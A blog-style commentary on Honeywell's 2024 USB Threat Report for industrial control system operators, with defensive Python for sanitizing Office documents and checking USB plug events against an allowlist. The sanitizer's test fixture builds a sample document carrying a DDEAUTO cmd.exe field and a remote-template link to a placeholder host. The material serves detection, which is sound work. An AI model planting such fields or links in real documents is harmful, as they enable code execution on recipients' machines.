Honeywell’s 2024 USB Threat Report should be required reading for any team that runs industrial control systems or manages OT environments. The report, produced by Honeywell GARD from aggregated telemetry across hundreds of industrial facilities, paints a clear picture: USB removable media are not a legacy nuisance. They are a primary vector for targeted, high-impact attacks against OT right now.
What the headline numbers mean in practice
- USB as a deliberate vector. Roughly half of the malware Honeywell observed was built to spread via USB devices, a sharp rise over the early years of the report series. Operators can no longer treat USB-borne files as incidental. If your operational workflows rely on flash drives for file transfers, you are in the crosshairs.
- Silent residency and living off the land. The report highlights a rise in adversaries using USBs to establish long-term, stealthy presence inside OT networks. Rather than detonating noisy exploits on arrival, attackers increasingly persist and move laterally through legitimate OS features and document macros. The pattern resembles espionage, with the option to turn the compromised systems against the process later.
- High potential for disruption. A large majority of the USB-borne malware Honeywell detected was capable of causing loss of view, loss of control or outages in OT environments. This is not limited to data theft; the practical outcomes are production stoppages, safety incidents and long recovery windows.
- Content-based attacks are rising. The report calls out content-based malware that weaponizes common document formats and their scripting features. A nontrivial share of blocked threats leveraged document functionality (macros and similar document features) rather than a traditional executable payload. Such files look innocuous to users and often pass basic signature-based controls.
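As an added illustration of what a content-inspection step looks like for the document-based threats described above (example code written for this page, not Honeywell's or SMX's logic), the script below inspects an OOXML package for three indicators, an embedded VBA project, relationships that point outside the file, and DDE field codes, and produces a macro-free copy. The sample document it builds is constructed in memory, including a placeholder vbaProject.bin, a remote-template relationship to the documentation address 192.0.2.10 and a DDEAUTO field; none of it is a real-world sample. The namespace URIs and content-type strings are the standard OOXML ones.

```python
"""Inspect and sanitize OOXML packages (.docx/.docm/.xlsx/.xlsm) at a transfer kiosk.
Covers an embedded VBA project, relationships that resolve outside the package
(TargetMode="External", the hook behind remote-template tricks) and DDE/DDEAUTO fields.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

CT_NS = "http://schemas.openxmlformats.org/package/2006/content-types"
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
MACRO_PART = re.compile(r"^(word|xl|ppt)/vbaProject(Signature)?\.bin$")
# A complete <w:instrText> run whose field code is DDE or DDEAUTO.
DDE_INSTR = re.compile(rb"<w:instrText[^>]*>[^<]*\bDDE(?:AUTO)?\b[^<]*</w:instrText>")
# Macro-enabled main-part content types and the macro-free type each is rewritten to.
MAIN_TYPE_FIX = {
    "application/vnd.ms-word.document.macroEnabled.main+xml":
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml":
        "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml",
}

def inspect_ooxml(data: bytes) -> dict:
    """Report macro parts, external targets, DDE fields and macro-enabled content types."""
    f = {"macro_parts": [], "external_targets": [], "dde_fields": 0, "macro_content_types": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            payload = zf.read(name)
            if MACRO_PART.match(name):
                f["macro_parts"].append(name)
            elif name == "[Content_Types].xml":
                for el in ET.fromstring(payload).iter():
                    if "macroEnabled" in el.get("ContentType", ""):
                        f["macro_content_types"].append(el.get("ContentType"))
            elif name.endswith(".rels"):
                for rel in ET.fromstring(payload).iter(f"{{{REL_NS}}}Relationship"):
                    if rel.get("TargetMode") == "External":
                        f["external_targets"].append(rel.get("Target"))
            elif name.endswith(".xml"):
                f["dde_fields"] += len(DDE_INSTR.findall(payload))
    return f

def _rewrite(payload: bytes, ns: str, fix) -> bytes:
    """Parse one XML part, apply fix() and re-serialize with the same default namespace."""
    ET.register_namespace("", ns)
    root = ET.fromstring(payload)
    fix(root)
    return ET.tostring(root, encoding="UTF-8", xml_declaration=True)

def _fix_content_types(root):
    for el in list(root):
        if MACRO_PART.match(el.get("PartName", "").lstrip("/")):
            root.remove(el)  # the Override that declared vbaProject.bin
        elif el.get("ContentType") in MAIN_TYPE_FIX:
            el.set("ContentType", MAIN_TYPE_FIX[el.get("ContentType")])

def _fix_rels(root):
    for rel in list(root):
        if rel.get("TargetMode") == "External" or rel.get("Target", "").endswith("vbaProject.bin"):
            root.remove(rel)

def sanitize_ooxml(data: bytes) -> bytes:
    """Return a copy of the package with macros, external links and DDE fields removed."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            if MACRO_PART.match(name):
                continue  # drop the VBA project (and any signature part) outright
            payload = src.read(name)
            if name == "[Content_Types].xml":
                payload = _rewrite(payload, CT_NS, _fix_content_types)
            elif name.endswith(".rels"):
                payload = _rewrite(payload, REL_NS, _fix_rels)
            elif name.endswith(".xml"):
                payload = DDE_INSTR.sub(b"", payload)
            dst.writestr(name, payload)
    return out.getvalue()

def build_sample_docm() -> bytes:
    """Constructed minimal macro-enabled document (not a real sample) for the checks above."""
    parts = {
        "[Content_Types].xml": (
            f'<Types xmlns="{CT_NS}">'
            '<Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
            '<Override PartName="/word/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/></Types>'),
        "word/_rels/document.xml.rels": (
            f'<Relationships xmlns="{REL_NS}">'
            '<Relationship Id="rId1" Target="vbaProject.bin" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject"/>'
            '<Relationship Id="rId2" Target="http://192.0.2.10/template.dotm" TargetMode="External" '
            'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"/></Relationships>'),
        "word/document.xml": (
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body>'
            r'<w:p><w:r><w:instrText> DDEAUTO c:\\Windows\\System32\\cmd.exe "/c echo test" </w:instrText></w:r></w:p>'
            '</w:body></w:document>'),
        "word/vbaProject.bin": b"\xd0\xcf\x11\xe0 placeholder bytes, not a real VBA project",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in parts.items():
            zf.writestr(name, content)
    return buf.getvalue()
```

On a kiosk the policy decision sits on top of inspect_ooxml(): anything with a non-empty finding is quarantined or sanitized before it is allowed onto the outbound medium, and the findings themselves are what you forward to the SOC. Sanitizing rewrites XML through ElementTree, so run it against your own real documents first to confirm Office still opens the output.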
On telemetry and sampling
Honeywell’s findings come from GARD analysis of Secure Media Exchange (SMX) telemetry, which is useful for spotting trends at scale, but the sampling context matters. Telemetry from a vendor product reflects only the media carried to checkpoints where that product is deployed, and says nothing about media that never passed through one. Use the report as an operational threat signal, not a census of all USB threats globally.
What to do now: a practical checklist
1) Treat removable media like network connections. Enforce policies that control who may introduce USB devices into OT systems and for what purpose. Where possible, replace ad hoc USB transfers with hardened, logged transfer points or secure jump stations.
2) Implement device control and logging at endpoints. Block unknown or unauthorized device classes, allowlist approved devices by hardware identity, and forward device events to your SOC so plug events and subsequent file activity can be investigated quickly. Visibility buys time.
3) Use an offline, single-purpose sanitization and transfer station for media you cannot eliminate. Run the kiosk from an immutable image that is rebuilt when patched, and monitor it closely. Files destined for OT should be scanned and, where feasible, rebuilt into a clean format (content disarm and reconstruction) on that isolated system, which is used for nothing else.
4) Harden document handling. Disable macros by default, restrict scripting engines, and convert inbound documents to PDF or other sanitized formats where operationally feasible. Train operators to treat unexpected files as suspicious even when they look like routine maintenance documents.
5) Apply segmentation and least privilege in OT. Assume a USB compromise will happen and limit what a single workstation or HMI account can reach. Enforce strict role separation between maintenance endpoints and control-plane systems.
6) Prepare an incident playbook that covers USB-borne vectors. Exercises should run through discovery, containment and rebuild for systems suspected of silent residency. Time to detection is the key metric.
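Step 2 in working form, as an added example rather than anything from the report: a triage pass over Windows Security event 6416 records (the Plug and Play audit event written when a new external device is recognized), matching USBSTOR devices by hardware serial against an assumed inventory of issued drives. The events, hostnames, serial numbers and the ALLOWED_SERIALS inventory are all constructed for this example.

```python
"""Allowlist check over Windows Security event 6416 records ("A new external device
was recognized by the system") forwarded from OT endpoints.

Every USBSTOR plug event is matched by hardware serial against the inventory of issued
drives; unknown drives, and drives that expose no unique serial at all, raise an alert.
Non-storage classes are logged so a surprise keyboard or network adapter on an HMI is
still visible to the SOC.
"""
import re
from dataclasses import dataclass

# USBSTOR instance ID: USBSTOR\Disk&Ven_<vendor>&Prod_<product>&Rev_<rev>\<serial>&<index>
USBSTOR_ID = re.compile(
    r"^USBSTOR\\Disk&Ven_(?P<vendor>[^&]*)&Prod_(?P<product>[^&]*)&Rev_(?P<rev>[^\\]*)\\(?P<instance>[^\\]+)$",
    re.IGNORECASE,
)

# Assumed inventory of issued maintenance drives, keyed by hardware serial (example data).
ALLOWED_SERIALS = {
    "4C530001230413101443": "maintenance drive M-07, issued to OT team",
}


@dataclass(frozen=True)
class UsbStorageDevice:
    vendor: str
    product: str
    serial: str
    has_unique_serial: bool


def parse_usbstor_id(device_id: str):
    """Split a USBSTOR device instance ID; return None for other device classes."""
    m = USBSTOR_ID.match(device_id)
    if not m:
        return None
    serial = m.group("instance").rsplit("&", 1)[0]  # drop the trailing &<index>
    # When a device reports no serial number, Windows synthesizes an instance ID whose
    # second character is '&' (e.g. 7&2a8b3c4d). Such drives cannot be allowlisted.
    unique = len(serial) > 1 and serial[1] != "&"
    return UsbStorageDevice(m.group("vendor"), m.group("product"), serial, unique)


def evaluate_event(event: dict) -> dict:
    """Verdict for one forwarded event: allow, alert, log or ignore, plus the reason."""
    if event.get("EventID") != 6416:
        return {"verdict": "ignore", "reason": "not a device-recognized event"}
    dev = parse_usbstor_id(event.get("DeviceId", ""))
    if dev is None:
        desc = f"{event.get('ClassName')}: {event.get('DeviceDescription')}"
        return {"verdict": "log", "reason": f"non-storage device, {desc}"}
    if not dev.has_unique_serial:
        return {"verdict": "alert", "reason": "mass storage without a unique serial", "device": dev}
    if dev.serial in ALLOWED_SERIALS:
        return {"verdict": "allow", "reason": ALLOWED_SERIALS[dev.serial], "device": dev}
    return {"verdict": "alert", "reason": "mass storage not on the allowlist", "device": dev}


def triage(events):
    """Annotate each event with host, time and verdict; the alerts are what goes to the SOC queue."""
    return [{"host": e["Computer"], "time": e["TimeCreated"], **evaluate_event(e)} for e in events]


# Constructed records shaped like the EventData of Security event 6416 (not real telemetry).
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-03-12T09:41:02Z", "Computer": "hmi-01.plant.example", "EventID": 6416,
     "ClassName": "DiskDrive", "DeviceDescription": "SanDisk Cruzer Blade USB Device",
     "DeviceId": r"USBSTOR\Disk&Ven_SanDisk&Prod_Cruzer_Blade&Rev_1.00\4C530001230413101443&0"},
    {"TimeCreated": "2024-03-12T10:05:44Z", "Computer": "eng-ws-03.plant.example", "EventID": 6416,
     "ClassName": "DiskDrive", "DeviceDescription": "Kingston DataTraveler 3.0 USB Device",
     "DeviceId": r"USBSTOR\Disk&Ven_Kingston&Prod_DataTraveler_3.0&Rev_PMAP\0019E06B0F8ABE81E8E10E5D&0"},
    {"TimeCreated": "2024-03-12T10:17:09Z", "Computer": "hmi-02.plant.example", "EventID": 6416,
     "ClassName": "DiskDrive", "DeviceDescription": "Generic Flash Disk USB Device",
     "DeviceId": r"USBSTOR\Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07\7&2a8b3c4d&0"},
    {"TimeCreated": "2024-03-12T10:17:11Z", "Computer": "hmi-02.plant.example", "EventID": 6416,
     "ClassName": "HIDClass", "DeviceDescription": "USB Input Device",
     "DeviceId": r"HID\VID_046D&PID_C31C&MI_00\8&1f2e3d4c&0&0000"},
    {"TimeCreated": "2024-03-12T10:20:00Z", "Computer": "hmi-02.plant.example", "EventID": 6420,
     "ClassName": "DiskDrive", "DeviceDescription": "Generic Flash Disk USB Device",
     "DeviceId": r"USBSTOR\Disk&Ven_Generic&Prod_Flash_Disk&Rev_8.07\7&2a8b3c4d&0"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row["time"], row["host"], row["verdict"].upper(), row["reason"])
```

Two caveats when you adopt this pattern: event 6416 is only written when the "Audit PNP Activity" subcategory is enabled on the endpoint, so confirm the audit policy before relying on it; and a serial-based allowlist is only as good as the inventory, so a drive with no unique serial is treated as an alert rather than silently accepted.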
On tools and purchases: what to ask vendors
- How do you detect content-based malware and document abuse? Signature-only coverage is not enough. Ask for evidence of behavioral analysis and worked examples of documents it has caught.
- What telemetry do you collect and how is the data shared? Establish whether detection rests on signatures, sandboxing, static heuristics or behavioral models, and what leaves your site. Telemetry scope determines which threats will ever be visible to you.
- Can the solution integrate with OT-safe processes? Many endpoint and network tools are built for IT and can disrupt control systems. Require OT-aware deployment modes and staged testing before anything touches production.
Final notes
Honeywell’s 2024 report is a sharp reminder that simple physical devices remain an effective tool for modern adversaries. The shift toward content-based and living-off-the-land techniques means defenders must treat USB hygiene as an operational safety task, not an IT checkbox. Start with policy, add endpoint controls, and validate with exercises. A pragmatic, layered approach reduces both the likelihood of initial compromise and the blast radius when it happens.